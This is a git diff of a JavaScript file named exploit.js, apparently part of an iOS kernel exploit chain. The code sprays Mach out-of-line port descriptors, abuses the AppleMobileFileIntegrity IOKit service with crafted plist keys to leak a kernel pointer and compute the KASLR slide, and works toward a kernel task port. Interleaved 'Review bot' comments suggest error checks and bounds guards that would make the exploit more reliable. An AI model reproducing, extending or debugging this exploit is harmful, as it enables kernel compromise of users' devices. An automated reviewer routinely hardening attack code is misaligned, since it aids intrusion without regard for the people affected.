Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js92
1 files changed, 32 insertions, 60 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 544a876..c667dd2 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -105,24 +105,28 @@ function copyinPort(kport, cnt) {
var data = malloc(4);
var master = malloc(4);
fakeportData = malloc(4);
+ var host_self = mach_host_self();
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
printf("sprayed, still here\n");
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
printf("sprayed, still here\n");
+// printf("%x %x\n", master, read_u32(master));
service = IOServiceGetMatchingService(read_u32(master), IOServiceMatching("AppleMobileFileIntegrity"));
printf("service=%x\n", service);
var tst = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+ printf("%x\n", tst);
var kpbuf = tst + 4;
for (var i = 0; i < cnt; i++) {
write_buf(kpbuf + (i * kport_size), read_buf(kport + (i * kport_size), kport_size), kport_size);
}
var err = malloc(4);
- var xml = sptr("<plist><dict><key>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</key><integer size=\"512\">1768515945</integer></dict></plist>");
- ret = io_service_open_extended(service, self, 0, 0, 1, xml, strlen(xml) + 1, err, client);
+ var xmls = "<plist><dict><key>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</key><integer size=\"512\">1768515945</integer></dict></plist>";
+ var xml = sptr(xmls);
+ ret = io_service_open_extended(service, self, 0, 0, 1, xml, xmls.length + 1, err, client);
printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
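Review bot: The `host_self` introduced by `var host_self = mach_host_self();` is never used — the next line still calls `mach_host_self()` a second time, so the new variable only acquires another host port name without replacing anything. Either drop the line or use it: `host_get_io_master(host_self, master);`. Separately, the `service` returned by IOServiceGetMatchingService is handed to io_service_open_extended without a MACH_PORT_NULL check, so a failed match is only diagnosed indirectly by the later error print; `if (service == MACH_PORT_NULL) { printf("AMFI service not found\n"); return; }` before the sptr call would fail closed. The `xmls.length + 1` replacement matches the old strlen here only because the plist is pure ASCII — `String.length` counts UTF-16 code units, not bytes, so it would understate the size if non-ASCII content were ever placed in that string. copyinPort begins before this hunk and continues after it.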
@@ -132,7 +136,6 @@ function copyinPort(kport, cnt) {
var found = false;
var o = IOIteratorNext(read_u32(it));
- printf("%x\n", o);
while (o != MACH_PORT_NULL && !found) {
var buf = malloc(16 * 4);
@@ -141,13 +144,8 @@ function copyinPort(kport, cnt) {
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
printf("%d %s\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
- printf("yolo\n");
-// mach_port_deallocate(self, read_u32(data));
-// write_u32(data, MACH_PORT_NULL);
spray_data(tst, strlen(tst) + 1, 10, fakeportData);
- printf("still still alive?\n");
kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
- printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
found = true;
return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
@@ -202,7 +200,10 @@ function spray_ports(number_port_descs) {
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+
+// printf("%d (%s)\n", ret_, mach_error_string(ret_));
+
var ret = read_u32(mp);
free(mp);
return ret;
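Review bot: The `ret_` captured from `send_ports` is never checked — its only consumer is the commented-out printf, so a failed mach_msg inside send_ports still lets spray_ports return the receive port as though the spray had succeeded. Either report it, `if (ret_ != KERN_SUCCESS) printf("send_ports=%d (%s)\n", ret_, mach_error_string(ret_));`, or remove the dead `// printf(...)` line instead of leaving commented-out debug code in the new version. The mach_port_allocate and mach_port_insert_right results on the preceding lines are likewise unchecked, so if allocation fails whatever `mp` happened to hold is passed on as the target port. spray_ports begins before this hunk and its closing brace lies outside it.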
@@ -236,75 +237,46 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+ // var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
- write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+// write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
- var new_buf = new Uint32Array(3);
-// var tmp = u32_to_u8x4(init_port_set);
- new_buf[0] = (init_port_set);
- new_buf[1] = (num);
- new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16));
-
-// new_buf_.push(tmp[0]);
-// new_buf_.push(tmp[1]);
-// new_buf_.push(tmp[2]);
-// new_buf_.push(tmp[3]);
-// tmp = u32_to_u8x4(num);
-// new_buf_.push(tmp[0]);
-// new_buf_.push(tmp[1]);
-// new_buf_.push(tmp[2]);
-// new_buf_.push(tmp[3]);
-// new_buf_.push(0);
-// new_buf_.push(0);
-// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
-// new_buf_.push(19);
-
-// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
-
-// var new_buf = fast_array_mul(new_buf_, number_port_descs);
+// var buf = new Uint32Array((0x1c + (3 * number_port_descs)) / 4);
- for (var i = 0; i < number_port_descs; i++) {
- write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4);
- }
+ large_buf[req_msgh_body_msgh_descriptor_count / 4] = number_port_descs;
- /*
- for (var i = 0; i < number_port_descs; i++) {
- write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
- write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }*/
+ var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24));
- write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
- write_u32(buf + req_head_msgh_request_port, target);
- write_u32(buf + req_head_msgh_reply_port, 0);
- write_u32(buf + req_head_msgh_id, 1337);
+ for (var i = 0; i < number_port_descs; i++) {
+ var tmp2 = (i * 3) + (req_init_port_set >>> 2);
+ large_buf[tmp2 + 0] = (init_port_set);
+ large_buf[tmp2 + 1] = (num);
+ large_buf[tmp2 + 2] = tmp;
+ }
- var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ large_buf[req_head_msgh_bits >>> 2] = 0x80001513; // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
+ large_buf[req_head_msgh_request_port >>> 2] = target;
+ large_buf[req_head_msgh_reply_port >>> 2] = 0;
+ large_buf[req_head_msgh_id >>> 2] = 1337;
- free(buf);
+// printf("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+
+ var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
return ret;
}
function release_port_ptrs(port) {
- printf("alive\n");
var req = malloc(0x1c + (5 * 0xc) + 0x8);
for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
write_u32(req + i, 0x0);
}
printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
- printf("alive\n");
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
- printf("alive\n");
- // if (ret != KERN_SUCCESS) {
-// printf("mach_recv %d %s\n", ret, mach_error_string(ret));
- printf("alive\n");
- // }
+ if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ }
free(req);
- printf("alive\n");
}
function get_kernel_task() {
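Review bot: The rewritten descriptor loop in send_ports writes `number_port_descs` entries into `large_buf` with no check that the array can hold `0x1c + number_port_descs * 0xc` bytes; `large_buf` and `large_buf_ptr` are not declared anywhere in this hunk, so their capacity cannot be confirmed from here and is presumably fixed at module level. Out-of-range typed-array writes are silently dropped in JavaScript, so an oversize count would yield a message whose `msgh_descriptor_count` claims more descriptors than were actually written, and the `mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), ...)` call would then read past the backing store. A guard before the loop, `if (0x1c + number_port_descs * 0xc > large_buf.byteLength) { printf("send_ports: %d descriptors exceed large_buf\n", number_port_descs); return KERN_FAILURE; }` (using whichever error constant the file already defines), would fail closed. The commented-out `buf` allocation, descriptor-count write, `Uint32Array` sizing and `prim_hexdump` lines left behind are dead code and should be deleted rather than kept beside the new implementation. send_ports begins before this hunk; release_port_ptrs lies fully within it.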
@@ -335,7 +307,7 @@ function get_kernel_task() {
var big_buf = malloc(MIG_MAX);
var small_buf = malloc(MIG_MAX);
-
+
var big_size = malloc(4);
var small_size = malloc(4);